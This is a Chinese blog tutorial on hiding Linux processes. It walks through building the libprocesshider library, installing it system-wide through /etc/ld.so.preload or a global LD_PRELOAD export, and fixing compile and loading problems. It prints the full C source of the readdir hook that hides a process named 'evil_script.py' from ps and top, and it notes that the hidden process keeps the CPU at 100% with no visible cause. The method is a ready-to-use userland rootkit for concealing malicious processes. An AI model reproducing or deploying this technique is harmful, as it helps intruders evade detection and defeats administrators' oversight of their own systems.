linux 下隐藏进程的一种方法及遇到的坑

 更新时间:2018年09月07日 10:26:09   作者:mysgk  
这篇文章主要介绍了linux 下隐藏进程的一种方法,主要实现思路就是利用 LD_PRELOAD 来实现系统函数的劫持,具体实现代码,需要的朋友可以参考下

前言

1.本文所用到的工具在 https://github.com/gianlucaborello/libprocesshider 可以下载

2.思路就是利用 LD_PRELOAD 来实现系统函数的劫持

LD_PRELOAD是什么:

LD_PRELOAD是Linux系统的一个环境变量,它可以影响程序的运行时的链接(Runtime linker),它允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函数库。一方面,我们可以以此功能来使用自己的或是更好的函数(无需别人的源码),而另一方面,我们也可以以向别人的程序注入程序,从而达到特定的目的。

实现

1.下载程序编译

bmfxgkpt-yhd:~# git clone https://github.com/gianlucaborello/libprocesshider.git
Cloning into 'libprocesshider'...
remote: Counting objects: 26, done.
remote: Total 26 (delta 0), reused 0 (delta 0), pack-reused 26
Unpacking objects: 100% (26/26), done.
bmfxgkpt-yhd:~# cd libprocesshider/
bmfxgkpt-yhd:~/libprocesshider# make
gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
bmfxgkpt-yhd:~/libprocesshider#

2.移动文件到/usr/local/lib/目录下

mv libprocesshider.so /usr/local/lib/

3.把它加载到全局动态连接局

echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload

测试

1.我们运行evil_script.py

2.此时发现在top 与 ps 中都无法找到 evil_script.py

此时我们发现 cpu 100%,但是却找不到任何占用cpu高的程序

分析

#define _GNU_SOURCE
#include <stdio.h>
#include <dlfcn.h>
#include <dirent.h>
#include <string.h>
#include <unistd.h>
/*
 * Every process with this name will be excluded
 */
static const char* process_to_filter = "evil_script.py";
/*
 * Get a directory name given a DIR* handle
 */
static int get_dir_name(DIR* dirp, char* buf, size_t size)
{
  int fd = dirfd(dirp);
  if(fd == -1) {
    return 0;
  }
  char tmp[64];
  snprintf(tmp, sizeof(tmp), "/proc/self/fd/%d", fd);
  ssize_t ret = readlink(tmp, buf, size);
  if(ret == -1) {
    return 0;
  }
  buf[ret] = 0;
  return 1;
}
/*
 * Get a process name given its pid
 */
static int get_process_name(char* pid, char* buf)
{
  if(strspn(pid, "0123456789") != strlen(pid)) {
    return 0;
  }
  char tmp[256];
  snprintf(tmp, sizeof(tmp), "/proc/%s/stat", pid);
  FILE* f = fopen(tmp, "r");
  if(f == NULL) {
    return 0;
  }
  if(fgets(tmp, sizeof(tmp), f) == NULL) {
    fclose(f);
    return 0;
  }
  fclose(f);
  int unused;
  sscanf(tmp, "%d (%[^)]s", &unused, buf);
  return 1;
}
#define DECLARE_READDIR(dirent, readdir)                \
static struct dirent* (*original_##readdir)(DIR*) = NULL;        \
struct dirent* readdir(DIR *dirp)                    \
{                                    \
  if(original_##readdir == NULL) {                  \
    original_##readdir = dlsym(RTLD_NEXT, "readdir");        \
    if(original_##readdir == NULL)                 \
    {                                \
      fprintf(stderr, "Error in dlsym: %s\n", dlerror());     \
    }                                \
  }                                  \
  struct dirent* dir;                         \
  while(1)                              \
  {                                  \
    dir = original_##readdir(dirp);                 \
    if(dir) {                            \
      char dir_name[256];                     \
      char process_name[256];                   \
      if(get_dir_name(dirp, dir_name, sizeof(dir_name)) &&    \
        strcmp(dir_name, "/proc") == 0 &&            \
        get_process_name(dir->d_name, process_name) &&     \
        strcmp(process_name, process_to_filter) == 0) {     \
        continue;                        \
      }                              \
    }                                \
    break;                             \
  }                                  \
  return dir;                             \
}
DECLARE_READDIR(dirent64, readdir64);
DECLARE_READDIR(dirent, readdir);

1.程序定义了一个变量 process_to_filter 来控制不显示哪个进程名

2.重写readdir,

strcmp(process_name, process_to_filter) == 0)

当发现当前进程名称与 process_to_filter 相同时,继续循环.

遇到的坑

1.某些Linux中这个程序编译通不过

解决方法

删除最后两行中的一行

DECLARE_READDIR(dirent64, readdir64);
DECLARE_READDIR(dirent, readdir);

2.某些Linux中使用

shell echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
并不会生效
 此时我们需要配置环境变量
shell bmfxgkpt-yhd:~# vi /etc/profile
增加一行
shell export LD_PRELOAD=/usr/local/lib/libprocesshider.so

总结

以上所述是小编给大家介绍的linux 下隐藏进程的一种方法及遇到的坑,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对脚本之家网站的支持!

您可能感兴趣的文章:

相关文章

  • 详解Linux中关于引号的那些事

    详解Linux中关于引号的那些事

    这篇文章主要给大家介绍了关于Linux中关于引号的那些事,文中详细介绍了关于引号、单引号和双引号、引用单个字符以及反斜杠的其他使用技巧等的相关内容,介绍的非常详细,对大家具有一定的参考学习价值,需要的朋友们下面来一起看看吧。
    2017-06-06
  • Linux查看PCIe版本及速率的方法

    Linux查看PCIe版本及速率的方法

    在本篇文章里小编给大家整理的是关于Linux查看PCIe版本及速率的方法以及相关知识点,需要的朋友们参考下。
    2019-10-10
  • Apache设置目录禁止访问

    Apache设置目录禁止访问

    这篇文章主要介绍了如何在Apache中设置目录禁止访问,非常的简单实用,有需要的朋友可以参考下
    2014-11-11
  • Linux多线程编程快速入门

    Linux多线程编程快速入门

    这篇文章主要介绍了Linux多线程编程快速入门,涉及到了线程基本知识,线程标识,线程创建,线程终止,管理线程的终止等相关内容,小编觉得还是挺不错的,这里分享给大家,需要的朋友可以参考下
    2018-01-01
  • Ubuntu系统下网络配置文件解析与说明

    Ubuntu系统下网络配置文件解析与说明

    这篇文章主要给大家介绍了关于Ubuntu系统下网络配置文件的解析与说明,文中通过示例代码介绍的非常详细,对大家学习或者使用Ubuntu具有一定的参考学习价值,需要的朋友们下面来一起学习学习吧
    2019-08-08
  • linux中tar打包指定路径文件的实现方法

    linux中tar打包指定路径文件的实现方法

    下面小编就为大家带来一篇linux中tar打包指定路径文件的实现方法。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
    2016-12-12
  • Apache Web服务器的完全安装指南

    Apache Web服务器的完全安装指南

    本文讨论如何安装支持mod_perl、mod_ssl及php的apache web服务器,并安装webalizer实现对web访进行日志分析。手把手引导初学者编辑一个安全、功能完备的web服务器系统。
    2010-12-12
  • Linux上也有10个流行的Windows应用程序

    Linux上也有10个流行的Windows应用程序

    今天小编就为大家分享一篇关于在linux上也流行的windows程序,小编觉得内容挺不错的,现在分享给大家,具有很好的参考价值,需要的朋友一起跟随小编来看看吧
    2018-09-09
  • Linux命令详解之less命令

    Linux命令详解之less命令

    Linux下还有一个与more命令非常类似的命令--less命令,相比于more命令,less命令更加灵活强大一些,今天就给大家介绍下Linux下的less命令。
    2016-10-10
  • 如何利用多核CPU来加速你的Linux命令(GNU Parallel)

    如何利用多核CPU来加速你的Linux命令(GNU Parallel)

    这篇文章主要介绍了如何利用多核CPU来加速你的Linux命令(GNU Parallel),小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
    2019-01-01

最新评论